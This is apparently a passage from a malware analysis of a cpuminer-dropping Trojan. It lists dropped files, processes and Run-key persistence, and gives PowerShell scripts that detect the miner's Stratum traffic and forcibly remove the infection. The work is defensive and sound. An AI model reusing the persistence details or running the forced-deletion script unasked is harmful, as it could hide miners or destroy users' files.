CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@

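The JSON-RPC literals in the dump are the embedded miner's complete Stratum vocabulary (mining.subscribe, mining.authorize and mining.submit outbound; mining.notify, mining.set_difficulty and the client.* calls inbound), alongside the fixed getwork User-Agent "cpuminer/2.3.2". The PowerShell function below is added here as an example; it is not part of the Lavasoft report nor of cpuminer. It classifies newline-delimited payload lines (as pulled from a pcap or proxy log) against exactly those literals and extracts the worker credential from mining.authorize / mining.submit, which is the pool account the infection pays and the most useful pivot for incident response. The sample payload at the bottom is constructed: the pool host and the worker name are placeholders. Requires PowerShell 3.0 or later for ConvertFrom-Json.

```powershell
# Added example, not from the Lavasoft report or from cpuminer.
# Method names taken from the strings dump: what the miner sends, and what it handles.
$ClientMethods = @('mining.subscribe', 'mining.authorize', 'mining.submit', 'getwork')
$ServerMethods = @('mining.notify', 'mining.set_difficulty', 'client.reconnect',
                   'client.get_version', 'client.show_message')

function Test-CpuminerPayload {
    param([Parameter(Mandatory)][string]$Payload)

    $findings = @()
    foreach ($line in ($Payload -split "`r?`n")) {
        $line = $line.Trim()
        if (-not $line) { continue }

        # getwork / long-polling runs over HTTP; the UA string in the binary is a fixed literal.
        if ($line -match '^User-Agent:\s*cpuminer/2\.3\.2$') {
            $findings += [pscustomobject]@{ Kind = 'http-getwork'; Method = $null; Worker = $null; Detail = $line }
            continue
        }

        # Stratum is newline-delimited JSON-RPC; anything that does not parse is skipped.
        if ($line[0] -ne '{') { continue }
        try { $msg = $line | ConvertFrom-Json -ErrorAction Stop } catch { continue }
        $method = $msg.method
        if (-not $method) { continue }   # result/error replies carry no method

        if ($ClientMethods -contains $method) {
            $worker = $null
            # mining.authorize carries the pool account as params[0]; mining.submit repeats it.
            if ((@('mining.authorize', 'mining.submit') -contains $method) -and $msg.params.Count -ge 1) {
                $worker = [string]$msg.params[0]
            }
            $findings += [pscustomobject]@{ Kind = 'stratum-client'; Method = $method; Worker = $worker; Detail = $line }
        }
        elseif ($ServerMethods -contains $method) {
            $detail = $line
            # client.reconnect moves the miner to another pool: record the new endpoint.
            if ($method -eq 'client.reconnect' -and $msg.params.Count -ge 2) {
                $detail = '{0}:{1}' -f $msg.params[0], $msg.params[1]
            }
            $findings += [pscustomobject]@{ Kind = 'stratum-server'; Method = $method; Worker = $null; Detail = $detail }
        }
    }
    return $findings
}

# Constructed sample. The subscribe/authorize/submit lines are the literal formats from the
# dump with placeholder values; the pool host and worker name are invented for this example.
$sample = @'
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
{"id": 2, "method": "mining.authorize", "params": ["attacker.worker1", "x"]}
{"id": 1, "result": [[["mining.notify", "deadbeef"]], "08000002", 4], "error": null}
{"id": null, "method": "mining.set_difficulty", "params": [16]}
{"id": null, "method": "client.reconnect", "params": ["pool.example.invalid", 3333]}
{"method": "mining.submit", "params": ["attacker.worker1", "00000000", "00000000", "53b15ab2", "1a2b3c4d"], "id":4}
User-Agent: cpuminer/2.3.2
'@

Test-CpuminerPayload -Payload $sample | Format-Table Kind, Method, Worker, Detail -AutoSize
```

Matching on the method vocabulary rather than on a pool address is deliberate: the C2 host is whatever the attacker passes on the -o/--url command line (or later via client.reconnect), while the method names and the User-Agent are compiled into the binary and survive a pool change.
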
Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). Kill the miner as well as the droppers, otherwise the resident copy recreates the files deleted in step 3:

    0003F.tmp.exe:1500
    %original file name%.exe:1836
    %original file name%.exe:640 and minerd.exe:364 (processes the Trojan injects its code into; see Process activity)

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
    %Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
    %Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
    %Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry). The copy dropped into Start Menu\Programs\Startup (xncqnyyorsxlq.exe, step 3) is a second autostart; both must go or the Trojan returns at the next logon:

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
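
The six manual steps above as one script, added here as an example and not part of the Lavasoft report. Assumptions: a current Windows path layout, so the report's Windows XP "%Documents and Settings%" locations are mapped to $env:APPDATA ("Application Data"), $env:TEMP ("Local Settings\Temp") and the per-user Startup folder; process names are derived from the dropped file names; PowerShell 4.0 or later (Get-FileHash). Run it elevated. Without -Remove it only reports what it finds, which is the mode to use first; hashes are recorded before deletion so a hit can be matched against the MD5 at the top of the report.

```powershell
# Added example, not from the Lavasoft report. Triage (default) and clean-up (-Remove)
# for the indicators listed in the manual removal steps.
param([switch]$Remove)

# Process names from "Process activity" plus the dropped executables (assumption:
# the dropped files run under their own names).
$Processes = @('minerd', '0003F.tmp', '00040.tmp', 'xncqnyyorsxlq', 'wbohuxzhxt')

$Startup = [Environment]::GetFolderPath('Startup')
$DropDir = Join-Path $env:APPDATA 'A901719BDB96997A6903E6D034944796'
$Files = @(
    (Join-Path $DropDir 'minerd.exe'),
    (Join-Path $DropDir 'libcurl.dll'),
    (Join-Path $DropDir 'pthreadGC2.dll'),
    (Join-Path $env:APPDATA '675F5D2DB02D8342A557D0A4ECB70B5C'),
    (Join-Path $env:APPDATA '7425110477C00FBB20E6CF9BB432D760'),
    (Join-Path $env:APPDATA '31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y'),
    (Join-Path $env:APPDATA 'wbohuxzhxt.exe'),
    (Join-Path $env:TEMP '0003F.tmp.exe'),
    (Join-Path $env:TEMP '00040.tmp.exe'),
    (Join-Path $Startup 'xncqnyyorsxlq.exe')
)
$RunKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$RunName = 'toexrjunjmxmfsfluiznsagzgviplr'

# Step 1: processes first, so nothing is left running to re-drop the files.
foreach ($p in Get-Process -Name $Processes -ErrorAction SilentlyContinue) {
    Write-Output ('process  {0} (PID {1}) {2}' -f $p.ProcessName, $p.Id, $p.Path)
    if ($Remove) { Stop-Process -Id $p.Id -Force }
}

# Steps 2 and 3: dropped files. Hash before deleting for later correlation.
foreach ($f in $Files) {
    if (Test-Path -LiteralPath $f) {
        $md5 = (Get-FileHash -LiteralPath $f -Algorithm MD5).Hash
        Write-Output ('file     {0}  MD5={1}' -f $f, $md5)
        if ($Remove) { Remove-Item -LiteralPath $f -Force }
    }
}
if ($Remove -and (Test-Path -LiteralPath $DropDir)) {
    Remove-Item -LiteralPath $DropDir -Recurse -Force
}

# Step 4: the Run value. The value name is random per sample, so any other Run
# entry whose data points into %APPDATA% is listed for review as well.
$run = Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue
if ($run) {
    if ($run.PSObject.Properties[$RunName]) {
        Write-Output ('autorun  {0} = {1}' -f $RunName, $run.$RunName)
        if ($Remove) { Remove-ItemProperty -Path $RunKey -Name $RunName }
    }
    foreach ($prop in $run.PSObject.Properties) {
        if ($prop.Name -ne $RunName -and "$($prop.Value)" -like "*$env:APPDATA*") {
            Write-Output ('review   {0} = {1}' -f $prop.Name, $prop.Value)
        }
    }
}

# Steps 5 and 6: the Temporary Internet Files entries (google[1].htm, the *.png
# cache files) are beaconing residue rather than executables; clear the browser
# cache, then reboot and re-run this script without -Remove to confirm nothing returned.
if ($Remove) { Write-Output 'done     clear Temporary Internet Files, reboot, re-run without -Remove' }
```

The Startup-folder copy and the Run value are handled as two separate findings on purpose: removing only the registry value, which is what most removal write-ups stop at, leaves xncqnyyorsxlq.exe to restart the miner at the next logon.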